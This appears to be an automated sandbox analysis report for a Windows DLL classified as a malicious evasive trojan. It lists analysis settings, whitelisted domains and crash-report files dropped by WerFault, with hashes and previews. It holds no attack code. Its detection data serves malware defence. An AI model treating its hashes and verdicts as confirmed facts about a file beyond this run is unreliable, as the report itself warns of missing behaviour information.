              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
              Number of analysed new started processes analysed:42
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • HDC enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Detection:MAL
              Classification:mal100.troj.evad.winDLL@33/24@0/1
              EGA Information:
              • Successful, ratio: 100%
              HDC Information:
              • Successful, ratio: 49.1% (good quality ratio 38.7%)
              • Quality average: 53.2%
              • Quality standard deviation: 35.8%
              HCA Information:
              • Successful, ratio: 100%
              • Number of executed functions: 108
              • Number of non-executed functions: 244
              Cookbook Comments:
              • Found application associated with file extension: .dll
              • Adjust boot time
              • Enable AMSI
              • Override analysis time to 240s for rundll32

              Warnings

              • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
              • Excluded IPs from analysis (whitelisted): 40.74.108.123, 23.205.181.161, 52.183.220.149, 13.89.179.12, 20.42.65.92, 20.189.173.20
              • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, settings-prod-scus-2.southcentralus.cloudapp.azure.com, onedsblobprdwus15.westus.cloudapp.azure.com, ctldl.windowsupdate.com, settings-win.data.microsoft.com, settings-prod-wjp-1.japanwest.cloudapp.azure.com, onedsblobprdcus17.centralus.cloudapp.azure.com, arc.msn.com, atm-settingsfe-prod-weighted.trafficmanager.net, ris.api.iris.microsoft.com, e11290.dspg.akamaiedge.net, licensing.mp.microsoft.com, go.microsoft.com, onedsblobprdeus17.eastus.cloudapp.azure.com, store-images.s-microsoft.com, login.live.com, go.microsoft.com.edgekey.net, blobcollector.events.data.trafficmanager.net, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com
              • Not all processes where analyzed, report is missing behavior information
              • Report creation exceeded maximum time and may have missing disassembly code information.
              • Report size exceeded maximum capacity and may have missing behavior information.
              • Report size exceeded maximum capacity and may have missing disassembly code.
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtProtectVirtualMemory calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.

              Simulations

              Behavior and APIs

              TimeTypeDescription
              07:55:41API Interceptor1x Sleep call for process: loaddll64.exe modified
              07:56:14API Interceptor6x Sleep call for process: WerFault.exe modified

              Joe Sandbox View / Context

              IPs

              No context

              Domains

              No context

              ASNs

              No context

              JA3 Fingerprints

              No context

              Dropped Files

              No context

              Created / dropped Files

              C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_o7m_11367c9a87845cc6921717a32b2b775d264a34b9_f9b376b0_0c87fcc4\Report.wer

              Download File
              Process:C:\Windows\System32\WerFault.exe
              File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
              Category:dropped
              Size (bytes):65536
              Entropy (8bit):0.7565859812727551
              Encrypted:false
              SSDEEP:192:gucIi5JKv5Hvkij1j1I/u7s0S274ltfh:g8iHKBvbj1jq/u7s0X4ltfh
              MD5:3078BC0695A99BB4A93F8D62EF952274
              SHA1:AD39F6F75D8AF2A138B5D6158D164AAE2C134299
              SHA-256:CDAF7B426AE4C029D962AD37627DABBEFB8CB788B9FEAD6D1262FC563389499C
              SHA-512:A5295508B760FC062FB5434115268965648378AD70A54A6D65D0B914CE10D5AB15D2499D1D292E667E1DE52CD1C4E04BCB46CA6EB1A6C6C7EBF4ACB5E3941F5C
              Malicious:true
              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.0.1.7.6.5.7.7.2.3.9.6.2.4.6.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.0.1.7.6.5.7.7.7.8.3.3.7.3.2.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.5.a.1.4.a.7.4.-.8.6.1.e.-.4.b.c.1.-.b.a.7.b.-.e.f.3.5.0.6.8.1.3.8.0.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.4.3.b.e.9.3.4.-.c.0.8.e.-.4.f.1.0.-.9.c.9.2.-.0.c.f.0.b.e.b.9.c.a.a.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e._.o.7.m.2.s.e...d.l.l.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.a.0.-.0.0.0.1.-.0.0.1.7.-.c.b.6.f.-.2.1.c.a.d.a.9.2.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.2.f.3.4.c.c.f.d.d.8.1.4.1.a.e.e.e.2.e.8.9.f.f.b.0.7.0.c.e.2.3.9.c.7.d.0.0.7.0.6.!.r.

              C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_o7m_11367c9a87845cc6921717a32b2b775d264a34b9_f9b376b0_1a851adf\Report.wer

              Download File
              Process:C:\Windows\System32\WerFault.exe
              File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
              Category:dropped
              Size (bytes):65536
              Entropy (8bit):0.7569492849281425
              Encrypted:false
              SSDEEP:96:thW2F9miB0JPnymjR55K7zfh3pXIQcQBc64icErFcw3rTXaXz+HbHgSQgJPbwIDA:FOiiJKn5Hvki7jj1I/u7s0S274ltfh
              MD5:48163D0793FC9766E8D96E62E06D6BBD
              SHA1:E40FA4B3083A7A6AEA64F2EFCB4330F7B73A932A
              SHA-256:12BAA8660F751FAC3389B7476526821C74938A1162315A38E5AAF4F9D6BC43CB
              SHA-512:E495FC6087BC3739BE7007F9A6E116FDB86A5DDF45E111BE0AB4B706BDFB03EF42387D8082C69196191DF749BE63335AF6F54DFD7C166EF325CC1041B95E7AB0
              Malicious:true
              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.0.1.7.6.5.7.3.5.4.3.9.3.8.8.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.0.1.7.6.5.7.3.6.8.9.2.4.9.6.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.7.7.b.8.8.0.1.-.8.6.e.4.-.4.3.5.5.-.a.c.3.2.-.c.8.9.4.e.2.0.6.f.4.7.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.0.0.2.8.b.9.5.-.9.5.1.1.-.4.8.5.5.-.9.6.c.2.-.c.8.c.3.f.3.0.0.f.2.9.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e._.o.7.m.2.s.e...d.l.l.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.8.c.-.0.0.0.1.-.0.0.1.7.-.2.2.2.5.-.c.8.c.5.d.a.9.2.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.2.f.3.4.c.c.f.d.d.8.1.4.1.a.e.e.e.2.e.8.9.f.f.b.0.7.0.c.e.2.3.9.c.7.d.0.0.7.0.6.!.r.

              C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_o7m_6a3d3b77d926c8b9c069d88ebfa6640d3a6367c_f9b376b0_1047f84f\Report.wer

              Download File
              Process:C:\Windows\System32\WerFault.exe
              File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
              Category:dropped
              Size (bytes):65536
              Entropy (8bit):0.7566228112167848
              Encrypted:false
              SSDEEP:96:tAWgxFtUmimJPnyHjR55K7zfWpXIQcQ+c66HcERcw3CXaXz+HbHgSQgJPbwIDV9Y:8xZimJKHHQOHrUj1I/u7s0S274ltfh
              MD5:EF649F0456F00A0F01F91E9AE6CBB03D
              SHA1:E0B8A0190A92F1DDE7C0D7EEF2904E0B02284417
              SHA-256:D2586F6B2D7BB1063B7375314D980BF33CBD16BFEE48CB31843F5DE6DD4F4C88
              SHA-512:BF633A4C71F16C5AAB22A099298F27E90B355FAA1A52775872D7051777E71EFB612573E96548D619AF60C2078760D88BEB15E19DAAD934DF331C4B4C74D40EB5
              Malicious:true
              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.0.1.7.6.5.7.7.1.1.7.3.4.9.6.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.0.1.7.6.5.7.7.7.2.2.0.3.5.3.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.4.1.3.9.1.9.5.-.f.4.4.9.-.4.5.4.1.-.b.0.5.b.-.c.9.f.b.0.0.c.4.8.9.c.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.3.1.5.1.0.e.0.-.f.a.8.9.-.4.e.c.8.-.a.3.5.f.-.0.8.a.b.1.1.d.1.d.8.3.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e._.o.7.m.2.s.e...d.l.l.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.9.8.-.0.0.0.1.-.0.0.1.7.-.e.0.d.7.-.e.f.c.9.d.a.9.2.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.2.f.3.4.c.c.f.d.d.8.1.4.1.a.e.e.e.2.e.8.9.f.f.b.0.7.0.c.e.2.3.9.c.7.d.0.0.7.0.6.!.r.

              C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_o7m_6a3d3b77d926c8b9c069d88ebfa6640d3a6367c_f9b376b0_1a051bba\Report.wer

              Download File
              Process:C:\Windows\System32\WerFault.exe
              File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
              Category:dropped
              Size (bytes):65536
              Entropy (8bit):0.7556367581494399
              Encrypted:false
              SSDEEP:192:e6uxiApJK+HQOHrUj1I/u7s0S274ltfh:yxiAK2QOHrUjq/u7s0X4ltfh
              MD5:C80806B6026005C965D81A06F2E1A027
              SHA1:4D20FCC44CA50097D6980BC289D977469914813A
              SHA-256:D2810C143F37314057420D4287F07918B37CC6F24BFB90457B7513BCC09F9749
              SHA-512:356D927753033C328A9A1C8374BC0674AAEDCC18BD8E8EF9BF4454CB87D6589823FAE0FBC93A84BF9397AF553C55159B3E9791C1B8392127DD9ECC4144B2BA62
              Malicious:true
              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.0.1.7.6.5.7.3.2.5.0.3.9.1.7.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.0.1.7.6.5.7.3.4.5.0.3.9.1.0.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.d.e.1.d.8.f.3.-.0.1.f.2.-.4.1.4.8.-.9.6.0.7.-.5.9.a.2.d.3.1.c.a.d.3.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.5.d.d.3.1.b.f.-.3.2.9.1.-.4.4.b.4.-.9.0.a.2.-.9.8.4.2.6.f.9.6.4.8.a.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e._.o.7.m.2.s.e...d.l.l.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.a.c.-.0.0.0.1.-.0.0.1.7.-.1.1.0.c.-.c.7.c.3.d.a.9.2.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.2.f.3.4.c.c.f.d.d.8.1.4.1.a.e.e.e.2.e.8.9.f.f.b.0.7.0.c.e.2.3.9.c.7.d.0.0.7.0.6.!.r.

              C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_o7m_6a3d3b77d926c8b9c069d88ebfa6640d3a6367c_f9b376b0_1a3d1bd9\Report.wer

              Download File
              Process:C:\Windows\System32\WerFault.exe
              File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
              Category:dropped
              Size (bytes):65536
              Entropy (8bit):0.756667984621082
              Encrypted:false
              SSDEEP:96:twWLFUimieJPny1jR55K7zfWpXIQcQ+c66HcERcw3CXaXz+HbHgSQgJPbwIDV9wn:/SbieJK1HQOHrUj1I/u7s0S274ltfh
              MD5:5DC43B568EAA39D70932D95270D5D7C5
              SHA1:33C6845AD9792EF139B5F5971580F05A4E523490
              SHA-256:50BD2A41B6475CAD335643002A285D92A42BF48D6AB038A5267D490753C76616
              SHA-512:149ADE61B6DB6EDC1F66DB2AD6A2B651585633D26B262A3EE0E2F1FBFD881F9D80D79FCA17931274B91934ADABD084C15F62916351283433DEB2822DDD1C3D10
              Malicious:true
              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.0.1.7.6.5.7.3.2.3.9.5.2.4.8.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.0.1.7.6.5.7.3.4.3.0.1.5.0.2.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.1.c.2.2.7.0.c.-.0.0.6.7.-.4.a.8.c.-.a.b.5.c.-.8.4.e.6.d.1.8.3.6.8.d.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.0.0.8.c.c.3.2.-.a.0.4.7.-.4.c.8.e.-.a.4.b.e.-.8.e.e.6.f.b.8.6.4.0.f.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e._.o.7.m.2.s.e...d.l.l.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.a.0.-.0.0.0.1.-.0.0.1.7.-.8.d.c.a.-.c.1.c.3.d.a.9.2.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.2.f.3.4.c.c.f.d.d.8.1.4.1.a.e.e.e.2.e.8.9.f.f.b.0.7.0.c.e.2.3.9.c.7.d.0.0.7.0.6.!.r.

              C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_o7m_902f449332d7856897d9dc165134fe9c699d31d_f9b376b0_071400fa\Report.wer

              Download File
              Process:C:\Windows\System32\WerFault.exe
              File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
              Category:dropped
              Size (bytes):65536
              Entropy (8bit):0.7565364865976272
              Encrypted:false
              SSDEEP:192:vaCigJK6vHQOHc2j1I/u7sX/S274ltfh:iCiuKaQOHc2jq/u7sX/X4ltfh
              MD5:CD2B4BCAB52E57F46F6B8D4675B98ECE
              SHA1:8600187837031C4404A532D884D002E655CEF6C1
              SHA-256:5F9AE35EEA0A23051F21671F3587197DBE5CFDB479FAB43976ADA9C5A8A638E8
              SHA-512:C9176A07193450AE6DF3B63F3D48C5B58970F50D2AF0D3DC4E8374CF5DE0657F541C2803BBE19A0D5BE236F32E7E32478FB988C8DD81E831743C638217F95CA0
              Malicious:true
              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.0.1.7.6.5.7.7.2.1.7.4.3.4.7.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.0.1.7.6.5.7.7.8.0.3.3.7.0.3.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.1.e.c.0.3.9.d.-.2.3.4.f.-.4.c.7.a.-.a.7.8.5.-.d.8.2.b.1.a.0.2.9.f.b.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.0.a.e.c.3.9.e.-.3.c.b.c.-.4.6.4.3.-.8.b.1.5.-.3.9.6.1.8.9.7.2.f.4.c.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e._.o.7.m.2.s.e...d.l.l.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.e.4.-.0.0.0.1.-.0.0.1.7.-.1.2.1.3.-.c.9.c.a.d.a.9.2.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.2.f.3.4.c.c.f.d.d.8.1.4.1.a.e.e.e.2.e.8.9.f.f.b.0.7.0.c.e.2.3.9.c.7.d.0.0.7.0.6.!.r.

              C:\ProgramData\Microsoft\Windows\WER\Temp\WER76C0.tmp.dmp

              Download File
              Process:C:\Windows\System32\WerFault.exe
              File Type:Mini DuMP crash report, 14 streams, Fri Jul 8 14:55:32 2022, 0x1205a4 type
              Category:dropped
              Size (bytes):68806
              Entropy (8bit):1.512842655359008
              Encrypted:false
              SSDEEP:96:558Jwd8M7AhrSnwEVoi7C5AATiHvr2RNbCgPAkhgth4+wYE+WIXmIf3fgiWbvmhz:AJ8AAtiOC5vTYv6RNbCX4+wYEsYi95
              MD5:B06A079323BA2F2EEE4003B49A490281
              SHA1:680B6F9A729E6E65CA3E1AB6CBD6ED1248103184
              SHA-256:361F13AE486324DB1E620B5D6D663971E82E8813B95836CABF33C42998F4F88B
              SHA-512:4EC095FF44BB0489B003BFB96E03DFD670E6538F5C01182DE9BFCFD692AC8EB612D202564D205E61318972A67EDF160B4EFEA41152A441A5C06D4398C2A9B907
              Malicious:false
              Preview:MDMP....... .......dE.b....................................D...............T.......8...........T.......................................p....................................................................U...........B..............Lw................}.....T...........aE.b.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.................................................................................................................................................................................................................................................................................................................................................................................................................................................

              C:\ProgramData\Microsoft\Windows\WER\Temp\WER772D.tmp.dmp

              Download File
              Process:C:\Windows\System32\WerFault.exe
              File Type:Mini DuMP crash report, 14 streams, Fri Jul 8 14:55:33 2022, 0x1205a4 type
              Category:dropped
              Size (bytes):56346
              Entropy (8bit):1.6841046640872415
              Encrypted:false
              SSDEEP:96:5c8gcd8M7DCgIiLXkh82Zoi7C5AKdKx+xQ8cMaFI3r2A2ACjzMp7WItYIfKQ9YqX:1ruHqmv2OC5bw+xQH46XACjz03Gqltx
              MD5:BD48575EB77C42C256BB35753E1495B5
              SHA1:D47026C04261925D518914C04F2600CC42A35C79
              SHA-256:DC169FA54AECFB08BD6659CC777470644C992CB253462D117FC36EC0CC4686AA
              SHA-512:9E2A519672F622F196E4718048F404F4B120A7C7A2FCEB8FAF723A95F38FB4D00B6195A6BEA9970117AD379271117C6BC6BB0B15A5271BF7B0AB9A81CA5776C0
              Malicious:false
              Preview:MDMP....... .......eE.b.........................................)..........T.......8...........T...........0...............T...........@....................................................................U...........B..............Lw..................>...T...........aE.b.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.................................................................................................................................................................................................................................................................................................................................................................................................................................................

              C:\ProgramData\Microsoft\Windows\WER\Temp\WER79AF.tmp.WERInternalMetadata.xml

              Download File
              Process:C:\Windows\System32\WerFault.exe
              File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
              Category:dropped
              Size (bytes):8682
              Entropy (8bit):3.696758228200209
              Encrypted:false
              SSDEEP:192:Rrl7r3GLNiwBBNbs6Y2mRgmfv3SwAxCprN89by5kfVmm:RrlsNi+BNg6YvRgmfv3Swmyafd
              MD5:FB89EEFB0659BB679A254940CDD94F7A
              SHA1:46EBB25C7E6EE1B1380C24589BAA9E5346FEB44A
              SHA-256:59F9469AD60FF2103DED335991DBDCC10EEC1E44F67A9CFD3E44DB05D3EF2A1C
              SHA-512:B72CD433DBA0C7EECD840F88463EE72B9B2D54868B3F7C58D3F792BD4B1BE28956267CDB7A328FD686F1C373D33E193225C860670C4DA0B081179744026229D0
              Malicious:false
              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.5.6.0.<./.P.i.d.>.......

              C:\ProgramData\Microsoft\Windows\WER\Temp\WER7AB8.tmp.WERInternalMetadata.xml

              Download File
              Process:C:\Windows\System32\WerFault.exe
              File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
              Category:dropped
              Size (bytes):8490
              Entropy (8bit):3.6942421202436893
              Encrypted:false
              SSDEEP:192:Rrl7r3GLNiT1RNo6YXVOgmfv3SwAxCprS89byZQf1uRmm:RrlsNihRNo6YlOgmfv3SwHyufEZ
              MD5:05B4B55C42D4F4B7FE7CF4ED79BE50D9
              SHA1:4A2BC6B18E711B6146796E4AF81699B9CA1FE0D8
              SHA-256:E48237141375658B9441AABD1AD51973289B31CF0F0808774774098D001C354B
              SHA-512:F43627068A40E1394CED081C5612A781BCA1A30508B977B01C951C15E5B5D692006393CD0AA7B23CCA1ABA58F04C7667E1B423009BD6AAF41BFC14C11235B7F8
              Malicious:false
              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.5.7.2.<./.P.i.d.>.......

              C:\ProgramData\Microsoft\Windows\WER\Temp\WER7C6F.tmp.xml

              Download File
              Process:C:\Windows\System32\WerFault.exe
              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):4713
              Entropy (8bit):4.451591473114414
              Encrypted:false
              SSDEEP:48:cvIwSD8zsFvJgtBI9tBWgc8sqYjZ8fm8M4JCYCr1yFOyq85mQECOZESC5SDd:uITfFR7QgrsqYiJQyOVvDd
              MD5:5FC872EEE7BFBDE03F8ADF2D1E20AF69
              SHA1:0AAB0C24AD9AD2685024F6EDF78060DD13057D09
              SHA-256:D2881C6F247C1E33980EA62DF0D16488D92F0E1EBE4C40A64730B8D0CD3BE662
              SHA-512:38C697429761D9613C407E6C402B015CF0E20F0A53ECAB3D894767B21294710D7CC1DA47A9C9E8EF1B946B5A2A0AA26A524C90A761391DF70715F6A9F40EE49B
              Malicious:false
